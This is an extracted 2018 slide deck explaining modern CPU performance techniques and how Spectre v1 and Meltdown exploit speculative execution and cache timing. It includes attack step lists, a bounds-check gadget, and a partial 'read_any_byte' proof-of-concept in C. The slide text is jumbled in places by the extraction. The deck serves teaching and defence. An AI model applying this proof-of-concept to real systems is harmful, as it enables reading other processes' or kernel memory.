Modern CPUs use various techniques to improve performance such as instruction pipelining, cache memory, superscalar execution, out-of-order execution, speculative execution, and branch prediction. However, these optimizations can introduce security vulnerabilities like Spectre and Meltdown attacks which exploit side effects of speculative execution in the CPU cache to leak secret data from memory. Speculative execution may process instructions early before branch resolution, potentially loading secret data into the cache where an attacker can detect it using precise timing measurements. While fixes have been developed, fully mitigating these issues remains an ongoing challenge for CPU architecture.
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Spectre of Meltdowns
1. Andriy Berestovskyy
2018
The Spectre of Meltdowns
( ц ) А н д р
і й Б е р е с
т о в с ь к и
й
networking hourTCP
UDP
NAT
IPsec
IPv4
IPv6
internet
protocolsAH
ESP
authentication
authorization
accounting
encapsulation
security
BGP
OSPF
ICMP
ACLSNAT
tunnelPPPoE
GRE
ARP
discovery
NDP
OSI
broadcast
multicast
IGMP
PIM
MAC
DHCP
DNS
fragmentation
semihalf
berestovskyy
2. The Spectre of Meltdowns
● Evolution of CPUs
● Spectre1
Attack
● Security Holy Grail
● Meltdown3
Attack
● Fixes
● Spectre-Based Meltdown PoC
2
CPU?
3. Central Processing Unit (CPU) — electronic
circuitry that performs basic arithmetic,
logical, control and input/output operations
specified by the instructions.
— Wikipedia
3
Basic means
simple, right?
4. Modern CPU Die
4Source: Kaby Lake, https://newsroom.intel.com/press-kits/8th-gen-intel-core/
Why it’s so
complicated?
About 2 billion
transistors
How does it
work?
5. CPU Basic Operation Cycle*
5
Hardware
implementation?
Start
Fetch Instruction at PC
Decode Instruction
Load Data From Memory
Execute Instruction
Write Data to Memory
Update Registers and PC
* Instruction Cycle
7. Instructions Per Second (IPS) — measure of a
computer's processor speed.
— Wikipedia
7
MIPS?
FLOPS?
8. 4MHz CPU Performance
8
Cycle 1
Fetch Decode Execute Write
2 3 4 5 6 7 8
Fetch Decode Execute Write
mov ...
xor ...
cmp ...
9
Fetch
4M cycles per second / 4 cycles per instruction = 1 MIPS
Solutions?
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
De
...one cycle per
instruction?
More
performance!
9. Instruction pipelining — process different parts of
instructions in parallel, i.e. an attempt to keep
every part of the CPU busy.
— Wikipedia
9
Let’s do it!
11. Performance: Instruction Pipelining
11
Cycle 1
Fetch Decode Execute
2 3 5 6 7 8
Fetch Decode Write
mov ...
xor ...
cmp ...
9
Fetch
Basic Pipeline
Execute Write
div ... Decode Execute Write
Write
4
Execute
Decode
Fetch
How many MIPS for
4MHz CPU now?
12. 4MHz CPU with Pipeline
12
Cycle 1
Fetch Decode Execute Write
2 3 4 5 6 7 8
Fetch Decode Execute Write
mov ...
xor ...
cmp ...
9
Fetch
4M cycles per second / 1 cycle per instruction = 4 MIPS
Decode Execute Write
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
More
performance!
...more MHz?
13. 8MHz CPU with Pipeline
13
Cycle 1
F D E W
2 3 4 5 6 7 8
mov ...
xor ...
cmp ...
9
8M cycles per second / 1 cycle per instruction = 8 MIPS
More
performance?
F D E W
F D E W
10 11 12 13 14 15 16 17
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
14. 40MHz CPU Performance
14
Cycle
mov ...
xor ...
cmp ...
40M cycles per second / 1 cycle per instruction = 40 MIPS?
Really?
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
15. Clock Speed Does Not Scale
15
Cycle
mov ...
xor ...
cmp ...
40M cycles per second / 1 cycle per instruction = 40 MIPS
Source: https://en.wikipedia.org/wiki/Megahertz_myth
Why?
17. Cache — faster memory, closer to a CPU, which
stores copies of frequently used main memory
locations.
— Wikipedia
17
Let’s do it!
18. CPU with Pipeline and Cache
18
InstructionFetch/Decode
Memory
PC
InstructionDecode/Execute
Registers
InstructionExecute/Write
ALU
Performance?
Data
Cache
Instr.
Cache
Write
Buffer
* Intel i486 and newer
WriteExecuteDecode/LoadInstruction Fetch
What’s
changed?
19. divdiv ...
xor ... stall
CPU with Pipeline and Cache
19
Cycle
mov ...
xor ...
cmp ...
40M cycles per second / ~4 cycles per instruction = ~10 MIPS
stall
Stalls :(Stalls :(
Solution?
...but pipeline
sometimes stalls...
More
performance!
cache miss
20. Superscalar CPU — executes more than one
instruction during a clock cycle using
different execution units.
— Wikipedia
20
Let’s do it!
21. Superscalar CPU Instruction Cycle
21
Performance?
Start
Fetch Two Instructions
Decode Two Instruction
Load Order: D1, D2
Execute Two Instructions
Write Order: D1, D2
Update Order: D1, D2
* Intel Pentium and newer
Why order?
22. stalldiv ...
xor ... write ordering
Superscalar CPU with Cache
22
Cycle
mov ...
xor ...
cmp ...
40M CPS / ~4 CPI * 1,5 instructions per cycle = ~15 MIPS
Solutions?
cache miss
read ordering Ordering :(
...but stall due
to ordering...
More
performance!
div
23. Out-of-Order (dynamic) Execution — processor
executes instructions in order of input data and
execution units availability, not by their original
order in a program.
— Wikipedia
23
Let’s do it!
24. divdiv ...
xor ...
Out of Order CPU
24
Cycle
mov ...
xor ...
cmp ...
What about
conditional jumps?
cache miss
Read
reordering :(
* Intel Pentium Pro and newer
Write
reordering :(
Re-order buffers
on Intel CPUs
improves average instructions per cycle ratio
Why?
26. dependencyjbe ...
mov or
ret?
OoO CPU vs Conditional Jumps
26
Cycle
cmp ... cache miss
Solutions?
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov array(%rdi), %eax
.L1:
ret
xor ...
stall?
...but next instruction is
unknown...
More
performance!
PC
PC
28. dependencyjbe ...
CPU with Speculative Execution
28
Cycle
cmp ... cache miss
What if speculation is
incorrect?
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov array%rdi), %eax
.L1:
ret
xor ...
speculation
cache missmov*
ret* speculation
PC
PC
Continue with
mov!
29. branch miss penalty
dependencyjbe ...
Branch Miss
29
Cycle
cmp ... cache miss
xor ...
speculation
cache missmov*
ret*
icache missret
Options?
speculation
Flush the
pipeline!
...but branch misses are
very expensive...
More
performance!
PC
miss
30. Speculation Options
30
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
ret
...
mov array(%rd), %eax
ret
...
Options:
1. Execute left branch
2. Execute right branch
3. Execute both branches
4. Other?
Pros/cons?
Solution?
31. Branch Predictor — digital circuit that tries to
guess which way a branch will go
before this is known definitively.
— Wikipedia
31
How does it
work?
32. jbe ...
Branch Predictor
32
cmp ...
xor ...
mov ...
ret ...
...
Y Y Y Y
Branch History Table
N
N N N N
Y Y Y Y
Y Y Y Y
Y N Y
N N N N
N N N N
last n-bits of instruction address
2n
elements
Y Y Y Y
prediction
...
...
Source: https://en.wikipedia.org/wiki/Branch_predictor
Let’s do it!
33. dependencyjbe ...
CPU with Branch Predictor
33
Cycle
cmp ... cache miss
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov array(%rdi), %eax
.L1:
ret
xor ...
mov*
ret*
Solutions?
speculationspeculation
cache miss
...but there are no
more ideas...
More
performance!
PC
PC
Prediction: do not take branch
34. Multi-Core Processor — CPU with two or more
independent processing units called cores, which
read and execute program instructions.
— Wikipedia
34
How many
cores?
36. CPU Performance Summary
+ Instruction Pipelines
+ Memory Cache
+ Superscalar Execution
+ Out of Order Execution
+ Speculative Execution
+ Branch Prediction
+ Multiple Cores
± CPU Clock (to a certain extent)
36
Modern CPU
Core?
37. Modern CPU Core
37Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Instruction Decode Queue (micro-op queue)
Allocate/Rename/Retire/Move Elimination/Zero Idiom
Scheduler
ALU
Vec ALU
Vec Shft
Vec Add
Vec Mul
FMA
DIV
Branch2
ALU
Fast LEA
Vec ALU
Vec Shft
Vec Add
Vec Mul
FMA
Slow Int
Slow LEA
ALU
Fast LEA
Vec ALU
Vec Shuff
LD/STA
LD/STA
STD
STA
32K L1
Data
Cache
256K L2
Cache
32K L1
Instruct.
Cache
MSROM
Decoded
Icache
Legacy Decode Pipeline
Branch Prediction Unit
ALU
SHFT
Branch1
Port 0 Port 1 Port 5 Port 6
P. 2
P. 3
P. 4
P. 7
Modern CPU
Die?
L3
39. Because we need performance!
39
So, what about
Spectre et al?
40. All Your Secrets Belong to Us ()
uint8_t array[ 256 * 4096];
size_t array_size = 256;
uint8_t bounds_check(size_t idx)
{
if (idx < array_size)
return array[idx * 4096];
return 0;
}
40
bounds_check:
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
sal $12, %rdi
mov array(%rdi), %eax
.L1:
ret
Execution?
Full source: https://godbolt.org/g/Snb13E
Why?
41. dependencyjbe ...
Bounds Check on Modern CPU
41
Cycle
cmp ... cache miss
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
sal $12, %rdi
mov array(%rdi), %eax
xor ...
mov*
sal* speculation
cache miss
What about
cache?
PC
PC
speculation
Prediction: do not take branch
42. sal* speculation
Virtual Memory
dependencyjbe ...
Memory Prior Cache Misses
42
array
cmp ... cache miss
cmp %rdi, array_size(%rip)
jbe .L1
sal $12, %rdi
mov array(%rdi), %eax
mov* speculationcache miss
What will happen
after execution?
array_size
array_size * 4096
“cold” memory cached memory
PC
PC
Current Cycle
Prediction: do not take branch
43. Virtual Memory
dependencyjbe ...
Memory After Cache Misses
43
array
cmp ... cache miss
cmp %rdi, array_size(%rip)
jbe .L1
sal $12, %rdi
mov array(%rdi), %eax
mov* cache miss
array_size
“cold” memory cached memory
What if we missed
the branch?
PC
PC
Current Cycle
sal* speculation
speculation
Prediction: do not take branch
array_size * 4096
44. cmp ... cache miss
Virtual Memory
dependencyjbe ...
Memory After Branch Miss
44
array
sal $12, %rdi
mov array(%rdi), %eax
.L1:
ret
mov* cache miss
array_size
“cold” memory cached memory
PC
sal* speculation
speculation
Side effect!
miss
retPC
Flush the
pipeline!
How to detect
cache side effect?
45. Observing Cache Side Effects
45
Virtual Memory arrayarray_size
“cold” memory cached memoryuint8_t array[ 256 * 4096];
size_t array_size = 256;
...
for (i = 0; i < 256; i++) {
start = rdtscp();
tmp = array[i * 4096];
cycles = rdtscp() - start;
...
}
How can we exploit
this side effects?
* Simplification
Speculation
side effect
48. dependencyjbe ...
Bounds Check Pipeline
48
Cycle
cmp ... array_size
bounds_check(unsigned long):
cmp %rdi, array_size(%rip)
jbe .L1
mov base_array(%rdi), %eax
sal $12, %eax
mov side_effects(%rax), %eax
mov*
mov*
Prediction: do not take branch
speculation
side_effects
PC
PC
sal*
Data is
precached
Speculative read
from side_effect
Can we reach
outside the array?
50. Putting All Together: Spectre1
1. Call few times bounds_check() with valid index
2. Flush array_size from cache to get cache miss
3. Call bounds_check with index pointing to secret
4. Use secret as an index to side_effects
5. Observe side_effects access time
50Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?
51. Spectre1
Summary
1. Reason: cache side effects
2. The source code is valid, no (easy) fix in software
3. Cache side-channel might be fixed in the future
4. Reads any byte within current process memory
51
Is it even
dangerous?
53. HTTP POST secrets.json5
JavaScript Attack Scenario
53
Web
Browser
Web
Server
GET /1
2 OK index.html
4
GET /spectre.js3
OK spectre.js
Parse
index.html
Execute
spectre.js
Execution?
56. Process isolation — hardware and software
technologies designed to protect each process
from other processes by by disallowing
inter-process memory access.
— Wikipedia
56
Hardware?
In practice?
57. Virtual Memory — abstraction of the resources
that are actually available on a given machine.
Combination of hardware and software maps
Virtual Addresses into Physical Addresses.
— Wikipedia
57
How to map Virtual
to Physical?
58. Translation Lookaside Buffer (TLB) — stores recent
translations of virtual memory to physical memory,
i.e. address-translation cache. Part of CPU
memory-management unit (MMU).
— Wikipedia
58
Drawings!
59. Process Isolation
59
Process 1 arraymain()
Process 2 main()
64 bit virtual address space
Kernel syscall()
Physical Memory
data
Swap
Why?
Mapped by OS,
translated using TLB.
How to
communicate?
60. System Call — programmatic way to request a
service from the kernel. Syscall it is a privilege level
switch, no process context switch, i.e. syscall is
processed in user process context.
— Wikipedia
60
Why no process
context switch?
61. Skylake TLB Cache Hierarchy
61Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Level Page Size Entries
Instruction
First Level Data
Instruction
First Level Data
First Level Data
Second Level
Second Level
...how to access
kernel data?
4KB
4KB
2MB/4MB
2MB/4MB
1GB
Shared 4KB and 2/4MB
1GB
128
8 per thread
64
32
4
1536
16
So, if no process
context switch...
Not that
much :(
62. Start Kernel Map
Kernel Mapping
62
Process 1 array1main()
Process 2 main() Kernel syscall()
Physical Memory
data
Swap
Kernel syscall() data
SYSCALL
data access
Now, how to protect
kernel data?
Bomba!
63. CPU Privilege Level — per-process operating mode
restrictions on type and scope of operations that
can be performed, i.e. OS to run with more
privileges than application software.
— Wikipedia
63
64. Start Kernel Map
Privilege Level Switch
64
Process array1main() Kernel syscall() data
kernel is able to access process data
So, what is
Meltdown?
Mega!
privilege level switch (SYSCALL)
64 bit virtual address space
process is not able to access kernel data
65. Meltdown — hardware vulnerability, which allows
a rogue process to read all memory, even when it is
not authorized to do so.
— Wikipedia
65
Kernel is mapped to
each process...
66. Start Kernel Map
Meltdown
66
Process array1main() Kernel syscall() data
kernel is able to access process data
Let’s do it!
Meltdown :(
64 bit virtual address space
process is able to read kernel data
69. Putting All Together: Meltdown3
1. Find address of a kernel structure (out of scope)
2. Invoke a system call to cache this structure
3. Do Spectre1
, but with kernel address:
a. Call few times bounds_check() with valid index
b. Flush array_size from cache to get a cache miss
c. Call bounds_check with index pointing to kernel structure
d. Use secret as an index to side_effects
e. Observe side_effects access time
69Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?
70. Meltdown3
Summary
1. Reason 0: hardware bug — accessing memory
and checking privileges in parallel
2. Reason 1: cache side effects (i.e. Spectre)
3. Reason 2: kernel mapped into every process
to privilege, not process context switch
4. Reads any mapped and cached byte
70
Is it even
dangerous?
71. HTTP POST kernel-data.json5
Meltdown Attack Scenario
71
Web
Browser
Web
Server
GET /1
2 OK index.html
4
GET /meltdown.js3
OK meltdown.js
Parse
index.html
Execute
meltdown.js with
valid syscalls
How to fix?
72. Fixes: An Open Question
Spectre1
:
1. Speculation barrier
2. Other?
72
Meltdown3
:
1. Process ctx instead of
privilege lvl switch
2. PCID/ASID
3. Other?
74. uint8_t read_any_byte(uint64_t addr)
{
size_t tries, i, sum = 0, cnt = 0, mins[BYTE_VALUES];
addr -= (uint64_t)&base_array;
for (i = 0; i < BYTE_VALUES; i++)
mins[i] = SIZE_MAX;
for (tries = 0; tries < MIN_READS * 5; tries++) {
char buf[PAGE_SIZE];
if (fd > 0 && pread(fd, &buf, sizeof(buf), 0) < 0)
perror("Error reading /proc/version");
...
}
return 0;
}
for (i = 1; i <= BRANCH_TRAINS * 4; i++) {
_mm_clflush(&array_size);
sched_yield();
tmp = bounds_check(addr & (i % BRANCH_TRAINS - 1));
}
for (i = 1; i < BYTE_VALUES; i++) {
__sync_synchronize();
register uint64_t start_tsc = __rdtsc();
tmp = side_effects[i * PAGE_SIZE];
__sync_synchronize();
register uint64_t cycles = __rdtsc() - start_tsc;
_mm_clflush(&side_effects[i * PAGE_SIZE]);
if (cycles > MAX_READ_CYCLES)
break;
else if (cycles < mins[i])
mins[i] = cycles;
if (cnt > MIN_READS && mins[i] < sum / cnt * 2 / 3)
return i;
sum += cycles;
cnt++;
}
Read Any Byte()
Full source: https://github.com/berestovskyy/spectre-meltdown
Meltdown
75. References
1. Meltdown and Spectre
https://meltdownattack.com/
2. Spectre Attacks: Exploiting Speculative Execution bye Paul Kocher et al
https://spectreattack.com/spectre.pdf
3. Meltdown by Moritz Lipp et al
https://meltdownattack.com/meltdown.pdf
4. ARM Developer. Vulnerability of Speculative Processors to Cache Timing Side-Channel Mechanism
https://developer.arm.com/support/security-update
5. Intel Software Developer Manuals
https://software.intel.com/en-us/articles/intel-sdm
6. Spectre-based Meltdown proof of concept in just 99 lines of code:
https://github.com/berestovskyy/spectre-meltdown
75